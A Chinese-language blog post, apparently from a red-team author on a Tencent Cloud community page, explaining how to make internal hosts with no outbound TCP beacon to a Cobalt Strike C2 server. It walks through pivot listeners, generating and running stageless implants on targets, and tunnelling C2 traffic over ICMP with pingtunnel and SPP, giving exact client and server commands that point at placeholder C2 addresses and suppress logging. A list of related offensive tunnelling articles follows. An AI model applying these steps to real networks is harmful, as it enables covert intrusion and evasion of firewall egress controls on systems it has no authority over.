开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >内网渗透（特殊环境上线CobaltStrike）

内网渗透（特殊环境上线CobaltStrike）

R0A1NG

发布于 2022-05-01 06:33:05

发布于 2022-05-01 06:33:05

1K00

代码可运行

举报

文章被收录于专栏：R0A1NG 技术分享R0A1NG 技术分享

运行总次数：0

代码可运行

主机中转监听横向上线不出网域控

设置转发上线

设置监听地址和监听端口

生成无阶段木马

选择刚才新建的监听，生成木马

通过其他方式把木马上传到目标机器，并运行

仅ICMP出网上线cs（pingtunnel）

PingTunnel是一款常用的ICMP隧道工具下载地址：https://github.com/esrrhs/pingtunnel/releases 下载对应系统的PingTunnel

CS服务器运行PingTunnel服务端

./pingtunnel -type server

客户端开启监听，并把流量通过icmp服务器转发给CS服务器

pingtunnel.exe -type client -l :4466 -s icmpserver_ip -t c2_server_ip:9988 -tcp 1 -noprint 1 -nolog 1

CS新建监听

生成无阶段木马

监听器选择刚才创建的内网监听

上传到目标机器，运行，木马上线

ICMP出网上线cs（SPP）

spp是一个简单强大的网络代理工具。

服务器开启SPP服务端

./spp -type server -proto ricmp -listen 0.0.0.0

客户端

spp.exe -name "cs" -type proxy_client -server x.x.x.x -fromaddr :4466 -toaddr :9988 -proxyproto tcp -proto ricmp -nolog 1 -noprint 1

和上面新建监听器一样，也是生成无阶段木马，可成功上线CS

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2022-04-27，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

暂无评论

编辑精选文章

换一批

万字详解高可用架构设计

Go 开发者必备：Protocol Buffers 入门指南

10分钟带你彻底搞懂分布式链路跟踪

多租户的 4 种常用方案

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

60页PPT全解：DeepSeek系列论文技术要点整理

内网穿透之icmp隧道搭建+上线CS+环境场景搭建

windows server windows 网络安全 shell 网站

在后渗透中内网隧道是必不可少的，在能够TCP出网的情况下搭建隧道是最容易的，使用frp即稳定又方便，搭建几级代理都不是问题。但是也有很多TCP不出网的情况，在这种场景下搭建隧道就要另寻门路了。为了方便学习内网隧道技术，我在公司的内网环境搭建了基于windows系统的苛刻的隧道环境，其实很简单，都是windows自带防火墙的一些规则策略。通过各种尝试，终于完成此环境(不知道有没有别的问题)，现在把过程分享给大家~路过的师傅都来看看呀，有不正确的地方求教教我^^

亿人安全

2022/06/30

2.6K0

内网穿透之icmp隧道搭建+上线CS+环境场景搭建

内网隧道工具SPP尝鲜

.net 编程算法 udp 网络安全

通过一个工具基本可以满足演练过程中打隧道的要求（可惜不支持dns协议）。这篇文章主要是自己研究该工具如何使用的过程 0x02 工具简介

潇湘信安

2021/07/28

1.8K0

【内网安全】域防火墙&入站出站规则&不出网隧道上线&组策略对象同步

同步协议安全防火墙对象

解决网络不通讯问题代理与隧道技术：代理：流量转发至跳板机，可以是服务器或者肉鸡，最主要的特征是，无论代理后面挂了几个设备，代理对外只表现为一个设备。隧道：是通过特定的通讯方法，直接找到这个目标 reverse_tcp:反向后门主动连接自己服务器目标防火墙出 bind_tcp:正向自己服务器主动连接后门目标防火墙入

没事就要多学习

2024/07/18

3670

【内网安全】域防火墙&入站出站规则&不出网隧道上线&组策略对象同步

内网渗透-不出网上线学习研究

主机代理连接网络系统

朋友们现在只对常读和星标的公众号才展示大图推送，建议大家把“亿人安全“设为星标”，否则可能就看不到了啦

亿人安全

2024/03/26

4230

【内网安全】隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

协议安全服务端客户端内网穿透

需要实名人脸验证收费官网注册按照使用手册就可以实现内网穿透，认证需要手续费，提供免费隧道但是速度慢 https://www.ngrok.cc/ 支持的协议：tcp、http、https 支持的类型：正向代理、反向代理

没事就要多学习

2024/07/18

2350

【内网安全】隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目

【神兵利器】内网渗透之SPP隧道构建

测试代理反向代理协议 server

SPP是一款简单强大的网络代理工具，它可以满足我们在攻防演练过程中的打隧道的基本需求(除去DNS协议)，它具备以下特点：

Al1ex

2025/01/17

1550

【神兵利器】内网渗透之SPP隧道构建

内网隧道之spp

.net 网络安全容器镜像服务 udp 容器

启动tcp正向代理，将www.server.com的8080端口映射到本地8080，这样访问本地的8080就相当于访问到了www.server.com的8080

中龙技术

2022/09/29

1.3K0

利用PingTunnel上线cobalt strike

网络安全 udp tcp/ip

pingtunnel 是tcp/udp/sock5 流量伪装成icmp流量进行转发的工具。

Khan安全团队

2021/11/05

1.5K0

利用PingTunnel上线cobalt strike

内网隧道之pingtunnel

go windows github git 开源

github：https://github.com/esrrhs/pingtunnel

中龙技术

2022/09/29

1.8K0

内网隧道之pingtunnel

内网建立传输通道

tcp/ip https github http ssh

参考：http://www.0-sec.org/Tools/Cobalt%20Strike/32.html

渗透攻击红队

2020/05/25

1.4K0

【内网安全】隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

mac ICMP ssh dns 安全

判断：445通讯通过端口扫描是否开放445端口进行判断上线：借助通讯后绑定上线详见往期文章通讯：直接SMB协议通讯即可

没事就要多学习

2024/07/18

2850

【内网安全】隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

【内网安全】隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线

安全防火墙连接权限 ICMP

系统安装自行搭建好Windows各种操作系统后配置网络即可环境演示：4台Windows

没事就要多学习

2024/07/18

1940

【内网安全】隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线

ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透

2023腾讯·技术创作特训营第三期

本文介绍了利用ICMP协议进行隧道穿透的方法。ICMP协议不需要开放端口，可以将TCP/UDP数据封装到ICMP的Ping数据包中，绕过防火墙限制。常见的ICMP隧道穿透工具有Icmpsh、Icmptunnel、Pingtunnel等。本文以ICMPsh和Pingtunnel为例，介绍了如何利用ICMP协议进行隧道穿透。

一只特立独行的兔先生

2023/11/12

6230

ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透

内网隧道之ICMP隧道

网站 windows 安全 shell powershell

ICMP是一个比较特殊的协议，在一般的通信协议里如果两台设备要进行通信，肯定需要开放端口，而在ICMP协议下就不需要，最常见的ICMP消息为ping命令的回复，攻击者可以利用命令行得到比回复更多的ICMP请求，在通常情况下，每个ping命令都有相对应的回复与请求

Al1ex

2022/09/07

2.9K0

内网渗透之隐藏通信隧道技术

网站数据库 sql shell powershell

前段时间读了读徐哥的《内网安全攻防》，并复现了部分知识点，写篇文章记录下学习内容。

FB客服

2021/07/03

1.8K0

内网渗透：不出网渗透技巧

tcp/ip 网络安全安全

在最近的攻防演练中，遇到几个内网环境都不通外网的情况，因此，整理下用到的几种不出网内网渗透技巧。

FB客服

2020/08/28

4.8K0

内网渗透测试研究：隐藏通讯隧道技术

windows server windows shell powershell 网站

在实际的网络中，通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。

FB客服

2020/07/09

2.1K0

内网渗透测试研究：隐藏通讯隧道技术

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike？

shell 网站网络安全安全 http

大家好，这里是渗透攻击红队的第 68 篇文章，本公众号会记录一些红队攻击的案例，不定时更新！请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关！

渗透攻击红队

2021/09/02

2.5K0

[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike？

内网渗透之主机出网OR不出网隧道搭建

代理服务器工具权限主机

当拿到权限之后，做完本地信息收集，最重要的就是做个隧道，对内网进行下一步攻击，这里简单介绍几个常用的工具，主要针对于出网和不出网两种情况。出网情况拿到服务器权限之后，遇见这种机器，十分简单，针对不同情况搭建不同隧道，为了速度可以建立sockets隧道、为了隐蔽可以使用dns隧道、icmp隧道等，本文简单介绍几个常用工具。 frp frp 是一个专注于内网穿透的高性能的反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到

FB客服

2023/04/26

2.4K0

内网渗透之主机出网OR不出网隧道搭建

内网渗透 | 横向移动总结

linux https 网络安全 tcp/ip windows server

通常我们在渗透过程中从外围打点进入内网后拿到主机提升到system权限，这一台主机就已经拿下。但是我们进入内网的目标还是拿下尽可能多的主机，这时候选择横向移动的方法就尤为重要。今天就对一些常用的横向手法进行一个总结，有不足之处欢迎师傅们进行斧正。

HACK学习

2021/07/21

4.1K0

相关推荐

内网穿透之icmp隧道搭建+上线CS+环境场景搭建

更多 >

LV.0

这个人很懒，什么都没有留下～

作者相关精选

目录

主机中转监听横向上线不出网域控

仅ICMP出网上线cs（pingtunnel）

ICMP出网上线cs（SPP）

加入讨论

的问答专区 >

相关课程

一站式学习中心 >

AI绘画-StableDiffusion图像生成

大模型图像创作引擎

高性能应用服务